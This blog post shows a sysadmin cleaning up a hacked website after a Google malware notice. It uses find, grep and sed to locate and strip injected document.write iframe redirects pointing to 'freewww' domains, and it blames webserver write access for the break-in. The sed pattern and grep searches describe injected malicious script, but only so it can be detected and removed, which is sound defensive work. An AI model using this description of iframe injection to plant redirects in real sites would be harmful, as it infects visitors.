Finding And Fighting Malware On Your Website

A customer just called for emergency when they got a mail from Google saying their websites are infected by malware. It took half an hour to analyse and resolve the situation. We show how to get rid of malware using UNIX command line tools.

Finding

Von: noreply@google.com
Datum: 15.12.2012 07:04
Betreff: Malware notification regarding example.de
An: abuse@example.de, admin@example.de, administrator@example.de, contact@example.de, info@example.de, postmaster@example.de, support@example.de, webmaster@example.de

Dear site owner or webmaster of example.de, We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://example .de/
http://www.example .de/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//example.de/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you’ve secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.

Analysis

By looking at some JavaScript .js files by ourselves we saw that <iframe>s redirecting users to malicious pages got injected into the HTML document using JavaScript’s document.write() function to add text to a HTML document.

To find all infected files I used a find combined with grep:

$ find . -type f -print0 | xargs -0 grep -l iframe | grep document.write
  • find
  • -type f Find all files, not e.g. directories
  • -print0 Every found filename is terminated by NULL character
  • xargs Process each input item
  • -0 Read lines terminated by NULL character
  • grep -l Look for content in file and list filename only
  • iframe Content to look for
  • grep document.write Filter for string document.write

The filename provided by find is automatically added as an argument to grep by xargs. xargs is a program to execute a command for every thing got e.g. via stdin, as is with the pipe and find.

Result is a list with all infected files.

Solution

Remove <iframe>s

In this case the referenced sites were freewww.biz|info|..., so find all <iframe>s containing *freewww* and remove the code using sed:

for f in $(find . -type f -print0 | xargs -0 grep -l freewww)
do
    sed -i '' -e 's/;document.write(.<iframe .* src=.*freewww.*><\/iframe>.);//' $f
done
  • find . -type f -print0 | xargs -0 grep -l freewww Find all files containing the string freewww
  • for f in $(...) Process all found files referencing them by $f
  • Use sed to search and replace s/oldvalue/newvalue/options the malicious instruction ;document.write( <iframe src=freewww><\/iframe>.); with “nothing”. Use wildcards to ignore other noise in <iframe> tag

Lessons learned?

What was this all about? I’m pretty sure it was the last change the customer had requested a few days ago:
Please allow automatic updates of my Whatever PHP-based application, so allow write access for the webserver.

Why am I sure?

I usually do not allow write access for the webserver (except e.g. for file uploads, temporary files for sessions) and I can’t remember the last time I had such a situation :-D

HTH.

This entry was posted in System Administration and tagged , . Bookmark the permalink.